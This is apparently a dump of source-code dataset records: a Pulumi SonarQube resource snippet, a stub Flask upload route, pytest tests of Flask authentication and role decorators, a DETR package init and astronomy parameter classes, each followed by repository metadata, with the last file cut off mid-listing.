    def token_hash(self) -> pulumi.Output[str]:
        """
        A bcrypted hash of the attribute 'token'
        """
        return pulumi.get(self, "token_hash")
    @property
    @pulumi.getter
    def url(self) -> pulumi.Output[str]:
        """
        URL of the SonarQube server to connect with.
        """
        return pulumi.get(self, "url")
| 41.162338
| 182
| 0.644686
| 2,070
| 19,017
| 5.712077
| 0.095652
| 0.086519
| 0.097091
| 0.068843
| 0.821127
| 0.79567
| 0.774526
| 0.749662
| 0.725135
| 0.685132
| 0
| 0.014665
| 0.250565
| 19,017
| 461
| 183
| 41.251627
| 0.814973
| 0.308093
| 0
| 0.646825
| 1
| 0
| 0.098072
| 0.029505
| 0
| 0
| 0
| 0
| 0
| 1
| 0.15873
| false
| 0.003968
| 0.019841
| 0.011905
| 0.27381
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0ed57cc508b8e612c06778efa32dc45fe8ff0cba
| 192
|
py
|
Python
|
src/server/ModelUploadAPI.py
|
nikzagarwal/twentyone
|
d7426fc863773af9acca00c63099f064ed25b0e7
|
[
"MIT"
] | 9
|
2020-11-10T14:21:44.000Z
|
2021-10-02T13:12:50.000Z
|
src/server/ModelUploadAPI.py
|
Shubham2443/twentyone
|
5ac8a0e518a4249a84f8cb2f865437891b295c0d
|
[
"MIT"
] | null | null | null |
src/server/ModelUploadAPI.py
|
Shubham2443/twentyone
|
5ac8a0e518a4249a84f8cb2f865437891b295c0d
|
[
"MIT"
] | 7
|
2020-11-14T08:19:53.000Z
|
2021-08-11T14:41:37.000Z
|
from flask import Blueprint
# Flask blueprint grouping the model-upload routes for registration on the app.
model_upload_api = Blueprint('model_upload_api', __name__)
# TODO: implement the actual upload handling later.
@model_upload_api.route("/model_upload")
def model_upload():
    # Stub endpoint: returns a fixed placeholder string for now.
    return "Model Upload Response"
| 24
| 58
| 0.786458
| 26
| 192
| 5.346154
| 0.5
| 0.47482
| 0.302158
| 0.330935
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.114583
| 192
| 8
| 59
| 24
| 0.817647
| 0.026042
| 0
| 0
| 0
| 0
| 0.268817
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.2
| false
| 0
| 0.2
| 0.2
| 0.6
| 0.4
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
1609ab279af74e0741f5dc8b6d7dff8f8cef89a4
| 9,163
|
py
|
Python
|
v2/tests/security/test_decorators.py
|
jonfairbanks/rtsp-nvr
|
c770c77e74a062c63fb5e2419bc00a17543da332
|
[
"MIT"
] | 558
|
2017-10-04T14:33:18.000Z
|
2022-03-24T21:25:08.000Z
|
v2/tests/security/test_decorators.py
|
jonfairbanks/rtsp-nvr
|
c770c77e74a062c63fb5e2419bc00a17543da332
|
[
"MIT"
] | 22
|
2018-04-29T04:25:49.000Z
|
2021-08-02T17:26:02.000Z
|
v2/tests/security/test_decorators.py
|
jonfairbanks/rtsp-nvr
|
c770c77e74a062c63fb5e2419bc00a17543da332
|
[
"MIT"
] | 127
|
2017-11-14T19:47:27.000Z
|
2022-03-24T21:25:12.000Z
|
import pytest
from werkzeug.exceptions import Forbidden, Unauthorized
from backend.security.decorators import (
anonymous_user_required,
auth_required,
auth_required_same_user,
# roles_accepted, # tested by tests for auth_required
# roles_required, # tested by tests for auth_required
)
class MethodCalled(Exception):
    """Sentinel exception raised by stub functions to prove they were invoked."""
@pytest.mark.usefixtures('user')
class TestAnonymousUserDecorator:
    """Tests for @anonymous_user_required: blocks authenticated users."""
    def test_decorated_with_without_parenthesis(self):
        # The decorator must work both as @deco() and as bare @deco.
        @anonymous_user_required()
        def method():
            raise MethodCalled
        with pytest.raises(MethodCalled):
            method()
        @anonymous_user_required
        def method():
            raise MethodCalled
        with pytest.raises(MethodCalled):
            method()
    def test_authed_user_forbidden(self, client):
        # Once logged in, the wrapped function must not run: Forbidden instead.
        client.login_user()
        @anonymous_user_required
        def method():
            raise MethodCalled
        with pytest.raises(Forbidden):
            method()
    def test_anonymous_user_allowed(self):
        # No login: the wrapped function runs (MethodCalled proves it).
        @anonymous_user_required
        def method():
            raise MethodCalled
        with pytest.raises(MethodCalled):
            method()
@pytest.mark.usefixtures('user')
class TestAuthRequiredDecorator:
    """Tests for @auth_required and its role/roles/one_of/and_one_of kwargs.

    Convention: MethodCalled raised means the decorator let the call through;
    Unauthorized means no login; Forbidden means logged in but lacking roles.
    """
    def test_decorated_with_without_parenthesis(self):
        # The decorator must work both as @deco() and as bare @deco.
        @auth_required()
        def method():
            raise MethodCalled
        with pytest.raises(Unauthorized):
            method()
        @auth_required
        def method():
            raise MethodCalled
        with pytest.raises(Unauthorized):
            method()
    def test_anonymous_user_unauthorized(self):
        @auth_required
        def method():
            raise MethodCalled
        with pytest.raises(Unauthorized):
            method()
    def test_authed_user_allowed(self, client):
        client.login_user()
        @auth_required
        def method():
            raise MethodCalled
        with pytest.raises(MethodCalled):
            method()
    def test_with_role(self, client):
        client.login_user()
        @auth_required(role='ROLE_USER')
        def method():
            raise MethodCalled
        with pytest.raises(MethodCalled):
            method()
    def test_without_role(self, client):
        client.login_user()
        @auth_required(role='ROLE_FAIL')
        def method():
            raise MethodCalled
        with pytest.raises(Forbidden):
            method()
    def test_with_all_roles(self, client):
        # `roles` requires ALL listed roles.
        client.login_user()
        @auth_required(roles=['ROLE_USER', 'ROLE_USER1'])
        def method():
            raise MethodCalled
        with pytest.raises(MethodCalled):
            method()
    def test_without_all_roles(self, client):
        client.login_user()
        @auth_required(roles=['ROLE_USER', 'ROLE_FAIL'])
        def method():
            raise MethodCalled
        with pytest.raises(Forbidden):
            method()
    def test_with_one_of_roles(self, client):
        # `one_of` requires at least one of the listed roles.
        client.login_user()
        @auth_required(one_of=['ROLE_USER', 'ROLE_FAIL'])
        def method():
            raise MethodCalled
        with pytest.raises(MethodCalled):
            method()
    def test_without_one_of_roles(self, client):
        client.login_user()
        @auth_required(one_of=['ROLE_FAIL', 'ROLE_ALSO_FAIL'])
        def method():
            raise MethodCalled
        with pytest.raises(Forbidden):
            method()
    def test_with_role_and_one_of_roles(self, client):
        client.login_user()
        @auth_required(role='ROLE_USER', one_of=['ROLE_FAIL', 'ROLE_USER1'])
        def method():
            raise MethodCalled
        with pytest.raises(MethodCalled):
            method()
        @auth_required(roles=['ROLE_USER'], one_of=['ROLE_FAIL', 'ROLE_USER1'])
        def method():
            raise MethodCalled
        with pytest.raises(MethodCalled):
            method()
    def test_without_role_and_one_of_roles(self, client):
        # Either a failing role requirement or a failing one_of is Forbidden.
        client.login_user()
        @auth_required(role='ROLE_FAIL', one_of=['ROLE_USER'])
        def method():
            raise MethodCalled
        with pytest.raises(Forbidden):
            method()
        @auth_required(roles=['ROLE_FAIL'], one_of=['ROLE_USER'])
        def method():
            raise MethodCalled
        with pytest.raises(Forbidden):
            method()
        @auth_required(role='ROLE_USER', one_of=['ROLE_FAIL'])
        def method():
            raise MethodCalled
        with pytest.raises(Forbidden):
            method()
        @auth_required(roles=['ROLE_USER'], one_of=['ROLE_FAIL'])
        def method():
            raise MethodCalled
        with pytest.raises(Forbidden):
            method()
    def test_with_role_and_and_one_of_roles(self, client):
        client.login_user()
        @auth_required(role='ROLE_USER', and_one_of=['ROLE_FAIL', 'ROLE_USER1'])
        def method():
            raise MethodCalled
        with pytest.raises(MethodCalled):
            method()
        @auth_required(roles=['ROLE_USER'], and_one_of=['ROLE_FAIL', 'ROLE_USER1'])
        def method():
            raise MethodCalled
        with pytest.raises(MethodCalled):
            method()
    def test_without_role_and_and_one_of_roles(self, client):
        client.login_user()
        @auth_required(role='ROLE_FAIL', and_one_of=['ROLE_USER'])
        def method():
            raise MethodCalled
        with pytest.raises(Forbidden):
            method()
        @auth_required(roles=['ROLE_FAIL'], and_one_of=['ROLE_USER'])
        def method():
            raise MethodCalled
        with pytest.raises(Forbidden):
            method()
        @auth_required(role='ROLE_USER', and_one_of=['ROLE_FAIL'])
        def method():
            raise MethodCalled
        with pytest.raises(Forbidden):
            method()
        @auth_required(roles=['ROLE_USER'], and_one_of=['ROLE_FAIL'])
        def method():
            raise MethodCalled
        with pytest.raises(Forbidden):
            method()
    def test_only_one_of_role_or_roles_allowed(self, client):
        # Mutually-exclusive kwargs raise at decoration time, not call time.
        client.login_user()
        with pytest.raises(RuntimeError) as e:
            @auth_required(role='ROLE_USER', roles=['ROLE_USER1'])
            def method():
                raise MethodCalled
        assert 'can only pass one of `role` or `roles` kwargs to auth_required' in str(e)
    def test_only_one_of_one_of_or_and_one_of_allowed(self, client):
        client.login_user()
        with pytest.raises(RuntimeError) as e:
            @auth_required(one_of=['ROLE_USER'], and_one_of=['ROLE_USER1'])
            def method():
                raise MethodCalled
        assert 'can only pass one of `one_of` or `and_one_of` kwargs to auth_required' in str(e)
    def test_works_with_token_auth(self, client, user):
        # login_as uses token-based auth; the decorator must honor it too.
        client.login_as(user)
        @auth_required(role='ROLE_USER')
        def method():
            raise MethodCalled
        with pytest.raises(MethodCalled):
            method()
@pytest.mark.models('User(user, admin)')
class TestAuthRequiredSameUser:
    """Tests for @auth_required_same_user: the URL id must match the login.

    Each test patches flask.request.view_args to simulate the routed URL
    parameters, and undoes the patch afterwards.
    """
    def test_different_user_forbidden(self, client, monkeypatch, models):
        client.login_user()
        # URL targets the admin's id while logged in as the regular user.
        monkeypatch.setattr('flask.request.view_args', {'id': models.admin.id})
        @auth_required_same_user
        def method():
            raise MethodCalled
        with pytest.raises(Forbidden):
            method()
        monkeypatch.undo()
    def test_same_user_allowed(self, client, monkeypatch, models):
        client.login_user()
        monkeypatch.setattr('flask.request.view_args', {'id': models.user.id})
        @auth_required_same_user
        def method():
            raise MethodCalled
        with pytest.raises(MethodCalled):
            method()
        monkeypatch.undo()
    def test_non_default_parameter_name(self, client, monkeypatch, models):
        # The decorator accepts the view-arg name to compare ('user_id' here).
        client.login_user()
        monkeypatch.setattr('flask.request.view_args', {'user_id': models.user.id})
        @auth_required_same_user('user_id')
        def method():
            raise MethodCalled
        with pytest.raises(MethodCalled):
            method()
        monkeypatch.undo()
    def test_it_accepts_auth_required_kwargs(self, client, monkeypatch, models):
        # Role kwargs are forwarded to auth_required and enforced in addition
        # to the same-user check.
        client.login_user()
        monkeypatch.setattr('flask.request.view_args', {'id': models.user.id})
        @auth_required_same_user(role='ROLE_USER')
        def method():
            raise MethodCalled
        with pytest.raises(MethodCalled):
            method()
        @auth_required_same_user(roles=['ROLE_FAIL'])
        def method():
            raise MethodCalled
        with pytest.raises(Forbidden):
            method()
        @auth_required_same_user(one_of=['ROLE_USER', 'ROLE_FAIL'])
        def method():
            raise MethodCalled
        with pytest.raises(MethodCalled):
            method()
        @auth_required_same_user(role='ROLE_USER', and_one_of=['ROLE_USER1', 'ROLE_FAIL'])
        def method():
            raise MethodCalled
        with pytest.raises(MethodCalled):
            method()
        monkeypatch.undo()
| 26.33046
| 96
| 0.607552
| 986
| 9,163
| 5.371197
| 0.083164
| 0.088369
| 0.095166
| 0.176737
| 0.911254
| 0.865937
| 0.853097
| 0.825529
| 0.8125
| 0.799282
| 0
| 0.001233
| 0.291826
| 9,163
| 347
| 97
| 26.40634
| 0.814918
| 0.011241
| 0
| 0.734694
| 0
| 0
| 0.080729
| 0.01016
| 0
| 0
| 0
| 0
| 0.008163
| 1
| 0.240816
| false
| 0.012245
| 0.012245
| 0
| 0.269388
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
162303c4cea0a2c0c6ecd65143c28b1752cae49a
| 329
|
py
|
Python
|
datasets/torchvision_datasets/__init__.py
|
StephenStorm/DETReg
|
25ebc7792c7da4cc9c50a846149773b2684a040f
|
[
"Apache-2.0"
] | 1,454
|
2020-11-30T13:00:05.000Z
|
2022-03-31T13:06:38.000Z
|
datasets/torchvision_datasets/__init__.py
|
StephenStorm/DETReg
|
25ebc7792c7da4cc9c50a846149773b2684a040f
|
[
"Apache-2.0"
] | 127
|
2020-12-01T03:35:53.000Z
|
2022-03-24T08:59:17.000Z
|
datasets/torchvision_datasets/__init__.py
|
StephenStorm/DETReg
|
25ebc7792c7da4cc9c50a846149773b2684a040f
|
[
"Apache-2.0"
] | 275
|
2020-11-30T13:00:53.000Z
|
2022-03-29T14:49:46.000Z
|
# ------------------------------------------------------------------------
# Deformable DETR
# Copyright (c) 2020 SenseTime. All Rights Reserved.
# Licensed under the Apache License, Version 2.0 [see LICENSE for details]
# ------------------------------------------------------------------------
from .coco import CocoDetection
| 41.125
| 74
| 0.422492
| 25
| 329
| 5.56
| 0.96
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.020202
| 0.097264
| 329
| 7
| 75
| 47
| 0.447811
| 0.866261
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
16df3fb475bd553e5b6ffbb83bddf37b9774375b
| 25,844
|
py
|
Python
|
Engine/classes.py
|
dfm/igrins_rv
|
79aa31035bdc576c6c2ff05b6042146afaff49ac
|
[
"MIT"
] | null | null | null |
Engine/classes.py
|
dfm/igrins_rv
|
79aa31035bdc576c6c2ff05b6042146afaff49ac
|
[
"MIT"
] | null | null | null |
Engine/classes.py
|
dfm/igrins_rv
|
79aa31035bdc576c6c2ff05b6042146afaff49ac
|
[
"MIT"
] | null | null | null |
# These classes are all for convenient passing of variables between the main code, the telluric spectrum fitter, and the model function.
import numpy as np
class fitobjs:
    """Container bundling the observed spectrum, telluric templates, and
    masks that the main code hands to the telluric fitter and the model
    function (see module header)."""

    def __init__(self, s, x, u, continuum, watm_in, satm_in, mflux_in,
                 mwave_in, mask, masterbeam, CRmask):
        # Every constructor argument is stored verbatim as an attribute of
        # the same name.
        values = locals()
        for name in ('s', 'x', 'u', 'continuum', 'watm_in', 'satm_in',
                     'mflux_in', 'mwave_in', 'mask', 'masterbeam', 'CRmask'):
            setattr(self, name, values[name])
class inparams:
    # Parameter bundle for the main fitting stage.  Per the module header,
    # these classes exist purely to pass variables between the main code,
    # the telluric spectrum fitter, and the model function.
    def __init__(self,inpath,outpath,initvsini,vsinivary,plotfigs,initguesses,bvcs,tagsA,tagsB,nights,mwave,mflux,a0dict,xbounddict,maskdict):
        # Constructor arguments are stored verbatim as attributes.
        self.inpath = inpath
        self.outpath = outpath
        self.initvsini = initvsini
        self.vsinivary = vsinivary
        self.plotfigs = plotfigs
        self.initguesses = initguesses
        self.bvcs = bvcs
        self.tagsA = tagsA
        self.tagsB = tagsB
        # NOTE: mwave/mflux are stored under "0"-suffixed names.
        self.mwave0 = mwave
        self.mflux0 = mflux
        self.nights = nights
        self.a0dict = a0dict
        self.xbounddict = xbounddict
        self.maskdict = maskdict
        # Hard-coded per-order coefficient triples, keyed band ('H'/'K') ->
        # beam ('A'/'B') -> echelle order number.  Presumably polynomial
        # coefficients for the instrument profile ("ips") with the telescope
        # in the tight-mount configuration -- TODO confirm where evaluated.
        self.ips_tightmount_pars = { 'H':{
                'A':{
                    6: np.array([-0.0000014645, +0.0017169700, +3.3011855894]),
                    13: np.array([-0.0000012994, +0.0006988905, +3.0840663439]),
                    14: np.array([-0.0000009176, +0.0018138177, +2.2197275274]),
                    16: np.array([-0.0000013663, +0.0029909793, +1.3959663664]),
                    21: np.array([-0.0000013358, +0.0024666477, +1.5425597030]),
                    22: np.array([-0.0000013951, +0.0029079030, +1.2131742554]),
                    2: np.array([-0.0000011308, +0.0019048124, +3.1673497542]),
                    3: np.array([-0.0000006216, +0.0004114534, +3.4773458923]),
                    4: np.array([-0.0000018462, +0.0027342132, +2.9057196779]),
                    20: np.array([-0.0000005747, +0.0010462689, +2.0063265625])},
                'B':{
                    6: np.array([-0.0000017946, +0.0022191895, +3.7021645256]),
                    13: np.array([-0.0000018206, +0.0013364410, +3.3651564498]),
                    14: np.array([-0.0000009673, +0.0015895234, +2.9497750941]),
                    16: np.array([-0.0000011332, +0.0020813780, +2.4512905616]),
                    21: np.array([-0.0000015200, +0.0026951579, +1.8089261830]),
                    22: np.array([-0.0000017253, +0.0035481206, +1.2235501417]),
                    2: np.array([-0.0000011552, +0.0017634890, +3.8604002255]),
                    3: np.array([-0.0000006966, +0.0003965295, +4.0969467142]),
                    4: np.array([-0.0000020779, +0.0029574695, +3.3703599880]),
                    20: np.array([-0.0000010270, +0.0019515216, +1.9071269518])}
                },
            'K':{
                'A':{
                    3: np.array([+0.0000000000, -0.0013882852, +2.6491516427]),
                    4: np.array([+0.0000005570, -0.0014798964, +3.0322123928]),
                    5: np.array([+0.0000007815, -0.0018286569, +3.1884587077]),
                    6: np.array([+0.0000000223, -0.0002438801, +2.5610056734]),
                    2: np.array([+0.0000018993, -0.0041545122, +3.2722615480]),
                    7: np.array([+0.0000003846, -0.0008248737, +2.7054577962]),
                    8: np.array([+0.0000006032, -0.0011831188, +2.7613774604]),
                    10: np.array([-0.0000002109, +0.0008841434, +1.2082829518]),
                    14: np.array([+0.0000007984, -0.0020449382, +3.1101522478]),
                    16: np.array([+0.0000001490, +0.0009528175, +1.1385210594]) },
                'B':{
                    3: np.array([+0.0000000000, -0.0015962816, +3.1179187408]),
                    4: np.array([+0.0000006349, -0.0021247257, +3.7189580576]),
                    5: np.array([+0.0000009365, -0.0026350831, +3.9078691486]),
                    6: np.array([+0.0000003213, -0.0013484977, +3.3906863460]),
                    2: np.array([+0.0000017922, -0.0041528862, +3.4063864564]),
                    7: np.array([+0.0000005729, -0.0016962859, +3.4733681135]),
                    8: np.array([+0.0000007786, -0.0020117585, +3.4821592021]),
                    10: np.array([-0.0000001630, +0.0003023356, +1.8355214070]),
                    14: np.array([+0.0000006373, -0.0022195328, +3.4337657140]),
                    16: np.array([+0.0000000959, +0.0007723205, +1.3240275178]) }
                }
            }
        # Same structure as above, for the loose-mount configuration.
        self.ips_loosemount_pars = { 'H':{
                'A':{
                    6: np.array([-0.0000016233, +0.0020134037, +3.3487332787]),
                    13: np.array([-0.0000016702, +0.0011352918, +3.1532836476]),
                    14: np.array([-0.0000007901, +0.0014705165, +2.5939805593]),
                    16: np.array([-0.0000014554, +0.0032034428, +1.4193023750]),
                    21: np.array([-0.0000013562, +0.0024241969, +1.7204152786]),
                    22: np.array([-0.0000015438, +0.0032647489, +1.1711140400]),
                    2: np.array([-0.0000007673, +0.0011908119, +3.5574747235]),
                    3: np.array([-0.0000004539, +0.0000711467, +3.7569496247]),
                    4: np.array([-0.0000017014, +0.0022235883, +3.3469057729]),
                    20: np.array([-0.0000011548, +0.0024159347, +1.4899767054])},
                'B':{
                    6: np.array([-0.0000017564, +0.0020515363, +4.0061364082]),
                    13: np.array([-0.0000020047, +0.0015672027, +3.4707598384]),
                    14: np.array([-0.0000008056, +0.0012756590, +3.2498824876]),
                    16: np.array([-0.0000013302, +0.0026174646, +2.2733250373]),
                    21: np.array([-0.0000015477, +0.0028004919, +1.8687160412]),
                    22: np.array([-0.0000018236, +0.0037493865, +1.2926912294]),
                    2: np.array([-0.0000009144, +0.0012463162, +4.2410289004]),
                    3: np.array([-0.0000005587, +0.0001065024, +4.3728963431]),
                    4: np.array([-0.0000021505, +0.0029466667, +3.6128512030]),
                    20: np.array([-0.0000014158, +0.0027485459, +1.7502302932])}
                },
            'K':{
                'A':{
                    3: np.array([+0.0000000000, -0.0032224396, +5.8539233388]),
                    4: np.array([+0.0000009369, -0.0042696048, +6.7611052624]),
                    5: np.array([+0.0000010962, -0.0044543760, +6.7225421397]),
                    6: np.array([+0.0000003577, -0.0027097128, +5.7789655657]),
                    2: np.array([+0.0000000173, -0.0019826425, +4.8330715369]),
                    7: np.array([+0.0000008492, -0.0035313488, +5.9016867272]),
                    8: np.array([+0.0000010973, -0.0038178120, +5.6832992738]),
                    10: np.array([+0.0000002443, -0.0017360668, +4.1415859150]),
                    14: np.array([+0.0000015291, -0.0039022985, +4.6823412563]),
                    16: np.array([+0.0000003064, -0.0001454813, +2.0998323933]) },
                'B':{
                    3: np.array([+0.0000000000, -0.0033096773, +6.6865750935]),
                    4: np.array([+0.0000004442, -0.0034871860, +7.1654729260]),
                    5: np.array([+0.0000006937, -0.0038708805, +7.1443293518]),
                    6: np.array([-0.0000005376, -0.0011557174, +5.8402964783]),
                    2: np.array([-0.0000001693, -0.0021423525, +5.9778102108]),
                    7: np.array([+0.0000006778, -0.0035919133, +6.7264063526]),
                    8: np.array([+0.0000010518, -0.0041659367, +6.6036171357]),
                    10: np.array([+0.0000000258, -0.0016619486, +4.7519124026]),
                    14: np.array([-0.0000007761, -0.0001818842, +3.9448840447]),
                    16: np.array([+0.0000002462, -0.0002856080, +2.5831334692])}
                }
            }
        # Per-method variance estimates per band; presumably one entry per
        # retained order (see the order lists in the comments below) --
        # TODO confirm against the consumer of these arrays.
        # old H tight~ 0.0149323 , 0.02518648, 0.00716132, 0.00592511, 0.04312596, 0.0075384
        #                                         6           14          16          21          22
        self.methodvariance_tight = { 'H': np.array([0.01145274, 0.00897732, 0.00569098, 0.05562397, 0.0049196]),
                                      #             3           4           5           6
                                      'K': np.array([0.00184696, 0.0016166, 0.00291516, 0.00139631])
                                      }
        self.methodvariance_loose = { 'H': np.array([0.01145274, 0.00897732, 0.00569098, 0.05562397, 0.0049196]),
                                      'K': np.array([0.0110391, 0.02206625, 0.00439241, 0.00070363])
                                      }
        # Pixel-cut bounds per band and order: [left cut, right cut].
        # Orders missing from a band use whatever default the caller applies
        # -- TODO confirm.
        self.bound_cut_dic ={ 'H':{
                                6: [425, 200],
                                10: [250, 150],
                                11: [600, 150],
                                #13: [200, 600],
                                13: [250, 750],
                                14: [750, 100],
                                16: [530, 100],
                                17: [1000,100],
                                20: [500, 150],
                                21: [200, 150],
                                22: [200, 150]},
                              'K':{
                                3: [150, 1350],
                                13: [200, 400],
                                14: [200, 400]}
                              }
class inparamsA0:
    """Parameter bundle for the A0 (telluric standard) fitting stage.

    Pure data container: every constructor argument is stored as an
    attribute so it can be passed between the main code, the telluric
    spectrum fitter, and the model function (see module header).
    """

    def __init__(self, inpath, outpath, plotfigs, tags, nights, humids,
                 temps, zds, press, obs, watm, satm, mwave, mflux, cdbsloc,
                 xbounddict, maskdict):
        self.inpath = inpath
        self.outpath = outpath
        self.plotfigs = plotfigs
        self.tags = tags
        self.humids = humids
        self.temps = temps
        self.zds = zds
        self.press = press
        # NOTE: 'obs' is stored under the pluralized name 'obses'.
        self.obses = obs
        self.watm = watm
        self.satm = satm
        # NOTE: mwave/mflux are stored under "0"-suffixed names.
        self.mwave0 = mwave
        self.mflux0 = mflux
        self.nights = nights
        self.cdbsloc = cdbsloc
        self.xbounddict = xbounddict
        # BUGFIX: the original code assigned maskdict twice in a row; the
        # redundant duplicate assignment was removed (no behavior change).
        self.maskdict = maskdict
        # Hard-coded per-order coefficient triples, keyed band ('H'/'K') ->
        # beam ('A'/'B') -> echelle order number.  Presumably polynomial
        # coefficients for the instrument profile ("ips") with the telescope
        # in the tight-mount configuration -- TODO confirm where evaluated.
        self.ips_tightmount_pars = { 'H':{
                'A':{
                    6: np.array([-0.0000014645, +0.0017169700, +3.3011855894]),
                    13: np.array([-0.0000012994, +0.0006988905, +3.0840663439]),
                    14: np.array([-0.0000009176, +0.0018138177, +2.2197275274]),
                    16: np.array([-0.0000013663, +0.0029909793, +1.3959663664]),
                    21: np.array([-0.0000013358, +0.0024666477, +1.5425597030]),
                    22: np.array([-0.0000013951, +0.0029079030, +1.2131742554]),
                    2: np.array([-0.0000011308, +0.0019048124, +3.1673497542]),
                    3: np.array([-0.0000006216, +0.0004114534, +3.4773458923]),
                    4: np.array([-0.0000018462, +0.0027342132, +2.9057196779]),
                    20: np.array([-0.0000005747, +0.0010462689, +2.0063265625])},
                'B':{
                    6: np.array([-0.0000017946, +0.0022191895, +3.7021645256]),
                    13: np.array([-0.0000018206, +0.0013364410, +3.3651564498]),
                    14: np.array([-0.0000009673, +0.0015895234, +2.9497750941]),
                    16: np.array([-0.0000011332, +0.0020813780, +2.4512905616]),
                    21: np.array([-0.0000015200, +0.0026951579, +1.8089261830]),
                    22: np.array([-0.0000017253, +0.0035481206, +1.2235501417]),
                    2: np.array([-0.0000011552, +0.0017634890, +3.8604002255]),
                    3: np.array([-0.0000006966, +0.0003965295, +4.0969467142]),
                    4: np.array([-0.0000020779, +0.0029574695, +3.3703599880]),
                    20: np.array([-0.0000010270, +0.0019515216, +1.9071269518])}
                },
            'K':{
                'A':{
                    3: np.array([+0.0000000000, -0.0013882852, +2.6491516427]),
                    4: np.array([+0.0000005570, -0.0014798964, +3.0322123928]),
                    5: np.array([+0.0000007815, -0.0018286569, +3.1884587077]),
                    6: np.array([+0.0000000223, -0.0002438801, +2.5610056734]),
                    2: np.array([+0.0000018993, -0.0041545122, +3.2722615480]),
                    7: np.array([+0.0000003846, -0.0008248737, +2.7054577962]),
                    8: np.array([+0.0000006032, -0.0011831188, +2.7613774604]),
                    10: np.array([-0.0000002109, +0.0008841434, +1.2082829518]),
                    14: np.array([+0.0000007984, -0.0020449382, +3.1101522478]),
                    16: np.array([+0.0000001490, +0.0009528175, +1.1385210594])},
                'B':{
                    3: np.array([+0.0000000000, -0.0015962816, +3.1179187408]),
                    4: np.array([+0.0000006349, -0.0021247257, +3.7189580576]),
                    5: np.array([+0.0000009365, -0.0026350831, +3.9078691486]),
                    6: np.array([+0.0000003213, -0.0013484977, +3.3906863460]),
                    2: np.array([+0.0000017922, -0.0041528862, +3.4063864564]),
                    7: np.array([+0.0000005729, -0.0016962859, +3.4733681135]),
                    8: np.array([+0.0000007786, -0.0020117585, +3.4821592021]),
                    10: np.array([-0.0000001630, +0.0003023356, +1.8355214070]),
                    14: np.array([+0.0000006373, -0.0022195328, +3.4337657140]),
                    16: np.array([+0.0000000959, +0.0007723205, +1.3240275178])}
                }
            }
        # Same structure as above, for the loose-mount configuration.
        self.ips_loosemount_pars = { 'H':{
                'A':{
                    6: np.array([-0.0000016233, +0.0020134037, +3.3487332787]),
                    13: np.array([-0.0000016702, +0.0011352918, +3.1532836476]),
                    14: np.array([-0.0000007901, +0.0014705165, +2.5939805593]),
                    16: np.array([-0.0000014554, +0.0032034428, +1.4193023750]),
                    21: np.array([-0.0000013562, +0.0024241969, +1.7204152786]),
                    22: np.array([-0.0000015438, +0.0032647489, +1.1711140400]),
                    2: np.array([-0.0000007673, +0.0011908119, +3.5574747235]),
                    3: np.array([-0.0000004539, +0.0000711467, +3.7569496247]),
                    4: np.array([-0.0000017014, +0.0022235883, +3.3469057729]),
                    20: np.array([-0.0000011548, +0.0024159347, +1.4899767054])},
                'B':{
                    6: np.array([-0.0000017564, +0.0020515363, +4.0061364082]),
                    13: np.array([-0.0000020047, +0.0015672027, +3.4707598384]),
                    14: np.array([-0.0000008056, +0.0012756590, +3.2498824876]),
                    16: np.array([-0.0000013302, +0.0026174646, +2.2733250373]),
                    21: np.array([-0.0000015477, +0.0028004919, +1.8687160412]),
                    22: np.array([-0.0000018236, +0.0037493865, +1.2926912294]),
                    2: np.array([-0.0000009144, +0.0012463162, +4.2410289004]),
                    3: np.array([-0.0000005587, +0.0001065024, +4.3728963431]),
                    4: np.array([-0.0000021505, +0.0029466667, +3.6128512030]),
                    20: np.array([-0.0000014158, +0.0027485459, +1.7502302932])}
                },
            'K':{
                'A':{
                    3: np.array([+0.0000000000, -0.0032224396, +5.8539233388]),
                    4: np.array([+0.0000009369, -0.0042696048, +6.7611052624]),
                    5: np.array([+0.0000010962, -0.0044543760, +6.7225421397]),
                    6: np.array([+0.0000003577, -0.0027097128, +5.7789655657]),
                    2: np.array([+0.0000000173, -0.0019826425, +4.8330715369]),
                    7: np.array([+0.0000008492, -0.0035313488, +5.9016867272]),
                    8: np.array([+0.0000010973, -0.0038178120, +5.6832992738]),
                    10: np.array([+0.0000002443, -0.0017360668, +4.1415859150]),
                    14: np.array([+0.0000015291, -0.0039022985, +4.6823412563]),
                    16: np.array([+0.0000003064, -0.0001454813, +2.0998323933])},
                'B':{
                    3: np.array([+0.0000000000, -0.0033096773, +6.6865750935]),
                    4: np.array([+0.0000004442, -0.0034871860, +7.1654729260]),
                    5: np.array([+0.0000006937, -0.0038708805, +7.1443293518]),
                    6: np.array([-0.0000005376, -0.0011557174, +5.8402964783]),
                    2: np.array([-0.0000001693, -0.0021423525, +5.9778102108]),
                    7: np.array([+0.0000006778, -0.0035919133, +6.7264063526]),
                    8: np.array([+0.0000010518, -0.0041659367, +6.6036171357]),
                    10: np.array([+0.0000000258, -0.0016619486, +4.7519124026]),
                    14: np.array([-0.0000007761, -0.0001818842, +3.9448840447]),
